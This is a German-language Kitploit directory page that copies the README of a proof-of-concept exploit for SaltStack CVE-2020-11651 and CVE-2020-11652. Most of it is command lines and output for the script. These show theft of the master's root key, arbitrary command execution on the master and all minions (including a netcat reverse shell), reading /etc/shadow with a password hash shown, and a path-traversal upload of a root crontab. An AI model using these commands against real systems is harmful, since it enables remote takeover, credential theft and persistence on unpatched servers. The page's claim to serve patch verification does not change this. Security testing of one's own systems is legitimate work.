Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2020-11651-PoC — Repository, das einen CVE-2020-11651-Exploit enthält, der für die neuesten Versionen von Python aktualisiert wurde. | Kitploit
Tools/GitHubGitHub/hardsoftsecurity/cve-2020-11651-poc
SchwachstellenanalyseExploitationPenetrationstestsCommand and ControlRemote-Access-ToolPayload-Entwicklung
GitHubhardsoftsecurity/cve-2020-11651-poc

CVE-2020-11651-PoC

Repository, das einen CVE-2020-11651-Exploit enthält, der für die neuesten Versionen von Python aktualisiert wurde.

Repository anzeigen
1vor 2 JahrenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2020-11651-PoC

Repository, das einen CVE-2020-11651-Exploit enthält, der für die neuesten Python-Versionen aktualisiert wurde und Fehler bei Verbindungen behandelt.

README-KOPIE AUS DEM URSPRÜNGLICHEN REPOSITORY

Ursprüngliches Repository

PoC-Exploit für CVE-2020-11651 und CVE-2020-11652

Dies ist ein Proof-of-Concept-Exploit basierend auf dem ersten Check-Skript. Verwenden Sie es, um zu überprüfen, ob Sie Ihre Salt-Master-Server erfolgreich auf eine Version mit den erforderlichen Fixes aktualisiert haben.

Dank an F-Secure Labs für ihre Forschung und Berichterstattung.

Derzeit kann dieses Skript für den Dateisystemzugriff und die Planung von Befehlen auf dem Master und allen verbundenen Minions verwendet werden. Nutzen Sie diese Kräfte weise!

Verwendung

Der Standardbetrieb (ohne Argumente) besteht darin, den Root-Key für den angegebenen Master zu erhalten:

root@kitploit:~
root@kalimah:~/salt# python3 exploit.py --master 192.168.115.130
[!] Bitte verwenden Sie dieses Skript nur, um zu überprüfen, ob Sie Systeme korrekt gepatcht haben, auf die Sie Zugriff haben. Drücken Sie ^C zum Abbrechen.
[+] Salt-Version: 3000.1
[ ] Diese Salt-Version ist anfällig! Überprüfen Sie die Ergebnisse unten.
[+] Überprüfe Salt-Master (192.168.115.130:4506) Status... ONLINE
[+] Überprüfe, ob anfällig für CVE-2020-11651...
[*] Root-Key erhalten: b5pKEa3Mbp/TD7TjdtUTLxnk0LIANRZXC+9XFNIChUr6ZwIrBZJtoZZ8plfiVx2ztcVxjK2E1OA=
root@kalimah:~/salt#

Ausführen beliebiger Befehle auf dem Master:

root@kitploit:~
root@kalimah:~/salt# python3 exploit.py --master 192.168.115.130 --exec "nc 127.0.0.1 4444 -e /bin/sh"
[!] Bitte verwenden Sie dieses Skript nur, um zu überprüfen, ob Sie Systeme korrekt gepatcht haben, auf die Sie Zugriff haben. Drücken Sie ^C zum Abbrechen.
[+] Salt-Version: 3000.1
[ ] Diese Salt-Version ist anfällig! Überprüfen Sie die Ergebnisse unten.
[+] Überprüfe Salt-Master (192.168.115.130:4506) Status... ONLINE
[+] Überprüfe, ob anfällig für CVE-2020-11651...
[*] Root-Key erhalten: b5pKEa3Mbp/TD7TjdtUTLxnk0LIANRZXC+9XFNIChUr6ZwIrBZJtoZZ8plfiVx2ztcVxjK2E1OA=
[+] Versuche, nc 127.0.0.1 4444 -e /bin/sh auf 192.168.115.130 auszuführen.
[+] Job erfolgreich geplant: 20200504153851746472
root@kalimah:~/salt#

Dasselbe, aber auf allen Minions:

root@kitploit:~
root@kalimah:~/salt# python3 exploit.py --master 192.168.115.130 --exec-all="apt-get upgrade -y"
[!] Bitte verwenden Sie dieses Skript nur, um zu überprüfen, ob Sie Systeme korrekt gepatcht haben, auf die Sie Zugriff haben. Drücken Sie ^C zum Abbrechen.
[+] Salt-Version: 3000.1
[ ] Diese Salt-Version ist anfällig! Überprüfen Sie die Ergebnisse unten.
[+] Überprüfe Salt-Master (192.168.115.130:4506) Status... ONLINE
[+] Überprüfe, ob anfällig für CVE-2020-11651...
[*] Root-Key erhalten: b5pKEa3Mbp/TD7TjdtUTLxnk0LIANRZXC+9XFNIChUr6ZwIrBZJtoZZ8plfiVx2ztcVxjK2E1OA=
[!] Lester, ist das was du willst? Drücken Sie ^C zum Abbrechen.
[+] Versuche, 'apt-get upgrade -y' auf allen mit 192.168.115.130 verbundenen Minions auszuführen.
[+] Job erfolgreich an alle Minions übermittelt.
root@kalimah:~/salt#

Dateien können gelesen werden mit:

root@kitploit:~
root@kalimah:~/salt# python2 exploit.py --master 192.168.115.130 -r /etc/shadow
[+] Salt-Version: 2019.2.0
[ ] Diese Salt-Version ist anfällig! Überprüfen Sie die Ergebnisse unten.
[+] Überprüfe Salt-Master (192.168.115.130:4506) Status... ONLINE
[+] Überprüfe, ob anfällig für CVE-2020-11651...
[*] Root-Key erhalten: GkJiProN36+iZ53buhvhm3dWcC/7BZyEomu3lSFucQF9TkrCRfA32EIFAk/yyQMkCyqZyxjjp/E=
[+] Versuche, /etc/shadow von 192.168.115.130 zu lesen.
root:$6$7qfolaa/$3yhszWj/VUJjfPaqr1yO6NLgV/FhHnVT9Pr6spwJ/F0BJw5vFM.3KjtwcnnuGo5uSJJkLrd28jXrmVZUD9nEI/:17812:0:99999:7:::
daemon:*:17785:0:99999:7:::
bin:*:17785:0:99999:7:::
sys:*:17785:0:99999:7:::
sync:*:17785:0:99999:7:::
games:*:17785:0:99999:7:::
man:*:17785:0:99999:7:::

Dateien können mit --upload-src und --upload-dest hochgeladen werden. Beachten Sie, dass das Ziel ein relativer Pfad sein muss:

root@kitploit:~
root@kalimah:~/salt#  python2 exploit.py --upload-src evil.crontab --upload-dest ../../../../../../var/spool/cron/crontabs/root
[+] Salt-Version: 2019.2.0
[ ] Diese Salt-Version ist anfällig! Überprüfen Sie die Ergebnisse unten.
[+] Überprüfe Salt-Master (127.0.0.1:4506) Status... ONLINE
[+] Überprüfe, ob anfällig für CVE-2020-11651...
[*] Root-Key erhalten: GkJiProN36+iZ53buhvhm3dWcC/7BZyEomu3lSFucQF9TkrCRfA32EIFAk/yyQMkCyqZyxjjp/E=
[-] Der Zielpfad muss relativ sein.
[+] Versuche, evil.crontab nach ../../../../../../var/spool/cron/crontabs/root auf 127.0.0.1 hochzuladen.
[ ] Daten in Datei /srv/salt/../../../../../../var/spool/cron/crontabs/root geschrieben.

Anforderungen

root@kitploit:~
Python 2 oder 3
Salt (pip3 install salt)
Tool herunterladen